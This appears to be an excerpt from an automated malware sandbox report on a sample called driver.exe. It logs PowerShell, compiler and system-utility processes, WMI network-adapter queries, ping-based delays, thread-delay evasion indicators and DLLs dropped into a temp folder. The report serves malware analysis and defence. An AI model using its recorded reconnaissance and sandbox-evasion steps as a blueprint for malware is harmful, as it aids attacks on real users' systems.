              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6258Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6357Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 474Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6117
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1343
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5057
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2549
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3381
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1821
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4302
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2594
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 891
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3076
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1443
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pydJump to dropped file
